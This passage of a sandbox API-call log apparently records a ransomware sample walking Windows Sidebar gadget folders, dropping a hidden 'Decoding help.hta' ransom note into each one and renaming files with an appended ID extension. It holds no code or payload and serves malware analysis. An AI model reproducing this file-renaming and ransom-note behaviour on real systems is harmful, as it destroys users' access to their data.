lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.294] FindNextFileW (in: hFindFile=0x24558aa8, lpFindFileData=0x2e36fd30 | out: lpFindFileData=0x2e36fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.294] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.294] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.294] FindNextFileW (in: hFindFile=0x24558aa8, lpFindFileData=0x2e36fd30 | out: lpFindFileData=0x2e36fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x467a, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.js", cAlternateFileName="")) returned 1 [0060.294] lstrcpyW (in: lpString1=0x9a9b0d8, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*" [0060.294] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*") returned 76 [0060.294] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\Decoding help.hta" [0060.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\decoding help.hta")) returned 0xffffffff [0060.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x698 [0061.537] WriteFile (in: hFile=0x698, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2e36fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2e36fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.538] CloseHandle (hObject=0x698) returned 1 [0061.538] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.538] lstrcmpiW (lpString1="Decoding help.hta", lpString2="clock.js") returned 1 [0061.538] lstrlenW (lpString="clock.js") returned 8 [0061.538] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*" [0061.538] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*") returned 76 [0061.538] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\", lpString2="clock.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js" [0061.538] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js" [0061.538] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js.[ID]g9uZrLhJaygpwRm1[ID]" [0061.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\clock.js"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\clock.js.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.527] FindNextFileW (in: hFindFile=0x24558aa8, lpFindFileData=0x2e36fd30 | out: lpFindFileData=0x2e36fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5c4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.js", cAlternateFileName="")) returned 1 Thread: id = 1001 os_tid = 0xca0 [0060.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*", lpFindFileData=0x2e4afd30 | out: lpFindFileData=0x2e4afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558ae8 [0060.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.295] FindNextFileW (in: hFindFile=0x24558ae8, lpFindFileData=0x2e4afd30 | out: lpFindFileData=0x2e4afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.295] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.295] FindNextFileW (in: hFindFile=0x24558ae8, lpFindFileData=0x2e4afd30 | out: lpFindFileData=0x2e4afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.css", cAlternateFileName="")) returned 1 [0060.295] lstrcpyW (in: lpString1=0x9aa30e0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*" [0060.296] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*") returned 80 [0060.296] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\Decoding help.hta" [0060.296] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\decoding help.hta")) returned 0xffffffff [0060.296] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x698 [0061.539] WriteFile (in: hFile=0x698, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2e4afcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2e4afcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.540] CloseHandle (hObject=0x698) returned 1 [0061.540] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.541] lstrcmpiW (lpString1="Decoding help.hta", lpString2="calendar.css") returned 1 [0061.541] lstrlenW (lpString="calendar.css") returned 12 [0061.541] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*" [0061.541] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*") returned 80 [0061.541] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\", lpString2="calendar.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" [0061.541] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" [0061.541] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css.[ID]g9uZrLhJaygpwRm1[ID]" [0061.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\calendar.css"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\calendar.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.541] FindNextFileW (in: hFindFile=0x24558ae8, lpFindFileData=0x2e4afd30 | out: lpFindFileData=0x2e4afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.css", cAlternateFileName="")) returned 0 [0061.541] FindClose (in: hFindFile=0x24558ae8 | out: hFindFile=0x24558ae8) returned 1 Thread: id = 1002 os_tid = 0xc98 [0060.296] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*", lpFindFileData=0x2e5efd30 | out: lpFindFileData=0x2e5efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558b28 [0060.296] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.296] FindNextFileW (in: hFindFile=0x24558b28, lpFindFileData=0x2e5efd30 | out: lpFindFileData=0x2e5efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.296] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.296] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.296] FindNextFileW (in: hFindFile=0x24558b28, lpFindFileData=0x2e5efd30 | out: lpFindFileData=0x2e5efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xff08, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.js", cAlternateFileName="")) returned 1 [0060.297] lstrcpyW (in: lpString1=0x11243ef8, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*" [0060.297] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*") returned 79 [0060.297] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\Decoding help.hta" [0060.297] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\decoding help.hta")) returned 0xffffffff [0060.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc88 [0061.541] WriteFile (in: hFile=0xc88, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2e5efcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2e5efcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.542] CloseHandle (hObject=0xc88) returned 1 [0061.542] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.543] lstrcmpiW (lpString1="Decoding help.hta", lpString2="calendar.js") returned 1 [0061.543] lstrlenW (lpString="calendar.js") returned 11 [0061.543] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*" [0061.543] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*") returned 79 [0061.543] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\", lpString2="calendar.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" [0061.543] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" [0061.543] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js.[ID]g9uZrLhJaygpwRm1[ID]" [0061.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\calendar.js"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\calendar.js.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.543] FindNextFileW (in: hFindFile=0x24558b28, lpFindFileData=0x2e5efd30 | out: lpFindFileData=0x2e5efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xff08, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.js", cAlternateFileName="")) returned 0 [0061.543] FindClose (in: hFindFile=0x24558b28 | out: hFindFile=0x24558b28) returned 1 Thread: id = 1003 os_tid = 0xe48 [0060.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*", lpFindFileData=0x2e72fd30 | out: lpFindFileData=0x2e72fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc54d0 [0060.298] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.298] FindNextFileW (in: hFindFile=0x10bc54d0, lpFindFileData=0x2e72fd30 | out: lpFindFileData=0x2e72fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.298] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.298] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.298] FindNextFileW (in: hFindFile=0x10bc54d0, lpFindFileData=0x2e72fd30 | out: lpFindFileData=0x2e72fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.css", cAlternateFileName="")) returned 1 [0060.298] lstrcpyW (in: lpString1=0x1124bf00, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*" [0060.298] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*") returned 74 [0060.298] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\Decoding help.hta" [0060.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\decoding help.hta")) returned 0xffffffff [0060.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b4 [0061.543] WriteFile (in: hFile=0x7b4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2e72fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2e72fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.544] CloseHandle (hObject=0x7b4) returned 1 [0061.544] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.545] lstrcmpiW (lpString1="Decoding help.hta", lpString2="calendar.css") returned 1 [0061.545] lstrlenW (lpString="calendar.css") returned 12 [0061.545] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*" [0061.545] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*") returned 74 [0061.545] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\", lpString2="calendar.css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" [0061.545] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows 